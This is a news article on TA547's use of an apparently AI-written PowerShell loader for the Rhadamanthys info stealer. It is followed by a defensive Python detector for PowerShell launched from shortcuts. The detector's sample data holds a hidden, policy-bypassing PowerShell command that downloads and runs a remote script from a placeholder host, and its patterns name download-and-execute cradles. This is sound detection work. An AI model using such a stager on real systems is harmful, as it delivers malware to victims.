Cybercrime Group Uses Likely AI Script to Load Info Stealer
Proofpoint Spots Novel Threat Against German Organizations

A financially motivated threat group targeting German businesses used a script apparently coded by artificial intelligence to download an info stealer onto victim computers, said Proofpoint.
The U.S. cybersecurity company said Wednesday it spotted the cybercrime group it tracks as TA547 deploying a PowerShell script with some unusual characteristics. The script, used to load the Rhadamanthys info stealer, contains "grammatically correct and hyper specific comments above each component of the script," Proofpoint said.
It's a best practice for coders to add comments in code, but the comments' redundant and chatty style is "typical output of LLM-generated coding content," Proofpoint said.
Coders for years now have looked to artificial intelligence to automate tasks, and more than 9 in 10 programmers use AI, according to a 2023 survey of American programmers. But the practice isn't without its risks (see: Hackers Can Use AI Hallucinations to Spread Malware).
The widespread availability of large language models has nonetheless supercharged worries that bad actors will turn to LLMs to boost their prowess. In this case, Proofpoint says, the threat actor used the apparently AI-generated script to deliver a malware payload but not to alter or design the info stealer itself. "Regardless of whether it is human or machine-generated, the defense against such threats remains the same," Proofpoint said.
The bait used by TA547 to spread malware purportedly originated with German cash-and-carry retailer Metro and supposedly pertains to an invoice. Bait that appears more realistic is, of course, another oft-voiced fear about criminal use of LLMs, although whether the threat actor used artificial intelligence to clean up its German grammar is unknowable.
Proofpoint first spotted TA547 in November 2017 distributing a banking Trojan. The researchers said the group is an initial access broker.
Once a victim takes the bait by opening a compressed file containing a Windows shortcut file - and executing the file - a chain of PowerShell scripts ultimately ends with Rhadamanthys loaded into computer memory.
Previously, the threat actor used zipped JavaScript attachments to deliver malware but transitioned to compressed LNKs in early March. In addition to Germany, recent campaigns have targeted organizations in Spain, Switzerland, Austria and the United States.
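The infection chain described above (user opens a shortcut from an archive, which spawns PowerShell that stages the payload) is something defenders can detect at the process-creation layer, as Proofpoint notes the defense is the same whether or not the script was machine-written. The following is an added illustration, not code from the article or from Proofpoint; the event records are constructed Sysmon-style process-creation entries with assumed field names (`image`, `parent`, `cmd`), and the command lines are made up for the sample.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
# Event 1 models the chain in the article: explorer.exe (the user double-clicking a
# .lnk from an archive) launching a hidden, policy-bypassing PowerShell stager.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmd": "explorer.exe"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'powershell.exe -w hidden -ep bypass -c "iex (iwr http://example.invalid/stage2.ps1)"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Vendor\Updater.exe",
     "cmd": r'powershell.exe -File "C:\Program Files\Vendor\update.ps1"'},
]

# Command-line traits commonly seen in PowerShell loaders; each match adds a reason.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|exec|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iex|invoke-expression|downloadstring|iwr|invoke-webrequest)\b", re.I),
     "download/eval cradle"),
]


def score_event(ev: dict) -> list[str]:
    """Return the list of reasons an event looks like a user-launched PowerShell stager."""
    reasons = []
    is_powershell = ev["image"].lower().endswith("powershell.exe")
    # Parent explorer.exe means an interactive double-click (a .lnk or file icon),
    # which is how the archive-and-shortcut lure in the article starts its chain.
    if is_powershell and ev["parent"].lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer (user double-click, e.g. LNK)")
    if is_powershell:
        for rx, label in SUSPICIOUS_ARGS:
            if rx.search(ev["cmd"]):
                reasons.append(label)
    return reasons


def find_alerts(events: list[dict], min_reasons: int = 2) -> list[int]:
    """Indices of events that accumulate at least min_reasons suspicious traits."""
    return [i for i, ev in enumerate(events) if len(score_event(ev)) >= min_reasons]


if __name__ == "__main__":
    for i in find_alerts(SAMPLE_EVENTS):
        print(f"event {i}: {'; '.join(score_event(SAMPLE_EVENTS[i]))}")
```

Requiring two or more reasons keeps a legitimate vendor updater running a script file (event 2) below the alert threshold while the lure chain (event 1) trips it on four.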